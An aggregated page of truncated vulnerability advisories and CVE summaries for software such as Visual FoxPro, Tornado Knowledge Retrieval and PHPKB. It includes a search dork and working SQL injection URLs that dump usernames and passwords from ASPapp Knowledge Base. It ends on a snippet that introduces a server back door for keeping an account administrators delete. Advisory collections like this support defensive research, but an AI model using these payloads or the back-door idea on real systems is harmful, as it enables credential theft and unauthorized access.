CanSecWest: Caution, community at play

CanSecWest, in beautiful Vancouver BC, is one of my favorite conferences each year. It’s a cozy little security con that brings together security researchers from all parts of the security ecosystem. Like a PhNeutral or a BlueHat, one never quite knows what to expect out of a CanSecWest, but we d...

Visual FoxPro vfp6r.dll ActiveX Control DoCmd command execution

Added: 12/19/2008 CVE: CVE-2008-0236 BID: 27205 OSVDB: 40380 Background Visual FoxPro is a tool for developing database applications. Problem The vfp6r.dll ActiveX control allows command execution when a user opens a web page which uses the DoCmd method. Resolution Set the kill bit for class ID...

Visual FoxPro vfp6r.dll ActiveX Control DoCmd command execution

Added: 12/19/2008 CVE: CVE-2008-0236 BID: 27205 OSVDB: 40380 Background Visual FoxPro is a tool for developing database applications. Problem The vfp6r.dll ActiveX control allows command execution when a user opens a web page which uses the DoCmd method. Resolution Set the kill bit for class ID...

Visual FoxPro vfp6r.dll ActiveX Control DoCmd command execution

Added: 12/19/2008 CVE: CVE-2008-0236 BID: 27205 OSVDB: 40380 Background Visual FoxPro is a tool for developing database applications. Problem The vfp6r.dll ActiveX control allows command execution when a user opens a web page which uses the DoCmd method. Resolution Set the kill bit for class ID...

Visual FoxPro vfp6r.dll ActiveX Control DoCmd command execution

Added: 12/19/2008 CVE: CVE-2008-0236 BID: 27205 OSVDB: 40380 Background Visual FoxPro is a tool for developing database applications. Problem The vfp6r.dll ActiveX control allows command execution when a user opens a web page which uses the DoCmd method. Resolution Set the kill bit for class ID...

Unfixed XSS vulnerability at www.the-knowledge-brokers.com

Security researcher SaMTHG, has submitted on 12/10/2008 a cross-site-scripting XSS vulnerability affecting www.the-knowledge-brokers.com, which at the time of submission ranked 3023025 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 05/11/2008...

Cross site scripting

Cross-site scripting XSS vulnerability in searcher.exe in Tornado Knowledge Retrieval System 4.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the p parameter in a root action...

CVE-2008-5264

Cross-site scripting XSS vulnerability in searcher.exe in Tornado Knowledge Retrieval System 4.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the p parameter in a root action...

CVE-2008-5264

Cross-site scripting XSS vulnerability in searcher.exe in Tornado Knowledge Retrieval System 4.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the p parameter in a root action...

CVE-2008-5264

The CVE-2008-5264 entry documents a Cross-site scripting (XSS) flaw in Tornado Knowledge Retrieval System versions 4.2 and earlier, affecting the searcher.exe component via the p parameter in a root action. Public sources do not provide additional exploit details, proof-of-exploit, affected versi...

LPViewer ActiveX Control url property buffer overflow

Added: 11/21/2008 CVE: CVE-2008-4384 BID: 31604 OSVDB: 48946 Background The LPViewer ActiveX Control installs with the iseemedia ZOOM control viewer and allows viewing of images created with iseemedia software. Problem A buffer overflow vulnerability allows command execution when a user opens a w...

Sql injection

Multiple SQL injection vulnerabilities in PHPKB Knowledge Base Software 1.5 Professional allow remote attackers to execute arbitrary SQL commands via the ID parameter to 1 email.php and 2 question.php, a different vector than CVE-2008-1909...

CVE-2008-5088

CVE-2008-5088 describes SQL injection vulnerabilities in PHPKB Knowledge Base Software 1.5 Professional. The vulnerability affects the ID parameter in two scripts, email.php and question.php, enabling remote attackers to execute arbitrary SQL commands. The connected documents provide concrete det...

ASPapp Knowledge Base - CatId SQL Injection (2)

ASPapp Knowledge Base - CatId SQL Injection 2 Dork - contentbycat.asp?contentid ''catid'' Exploit : contentbycat.asp?contentid=99999999&catid=-99887766 UNION SELECT 0,null,password,3,accesslevel,5,null,7,null,username from users Exploit 2 : contentbycat.asp?contentid=-99999999&catid=-99887766 uni...

ASPapp Knowledge Base - 'CatId' SQL Injection (2)

Dork - contentbycat.asp?contentid ''catid'' Exploit : contentbycat.asp?contentid=99999999&catid=-99887766 UNION SELECT 0,null,password,3,accesslevel,5,null,7,null,username from users Exploit 2 : contentbycat.asp?contentid=-99999999&catid=-99887766 union select...

phpkb-1.5-question.php.txt

PHPKB Knowledge Base Software v1.5 Professional question.php - SQL Injection Vulnerability http://www.knowledgebase-script.com ---------------------------------------------------------- Bug founded by d3v1l Date: 20.09.2007 [email protected]...

PHPKB 1.5 Professional Multiple Remote SQL Injection Vulnerabilities

No description provided by source. PHPKB Knowledge Base Software v1.5 Professional email.php - SQL Injection Vulnerability http://www.knowledgebase-script.com ---------------------------------------------------------- Bug founded by d3v1l Date: 20.09.2007 [email protected]...

PHPKB 1.5 Professional Multiple Remote SQL Injection Vulnerabilities

Exploit for unknown platform in category web applications ==================================================================== PHPKB 1.5 Professional Multiple Remote SQL Injection Vulnerabilities ==================================================================== PHPKB Knowledge Base Software v1...

PHPKB 1.5 Professional - Multiple SQL Injections

PHPKB Knowledge Base Software v1.5 Professional email.php - SQL Injection Vulnerability http://www.knowledgebase-script.com ---------------------------------------------------------- Bug founded by d3v1l Date: 20.09.2007 [email protected] ----------------------------------------------------------...

To prevent the administrator to delete your account-vulnerability warning-the black bar safety net

! ! ! there are many of my friends have a server, but is the system administrator found, it will delete your number, Hey..there's a back door, but the system administrator the CMD prohibit the net . exe net 1. exe. Delete the number, and some friends that I can also manage! That the management of...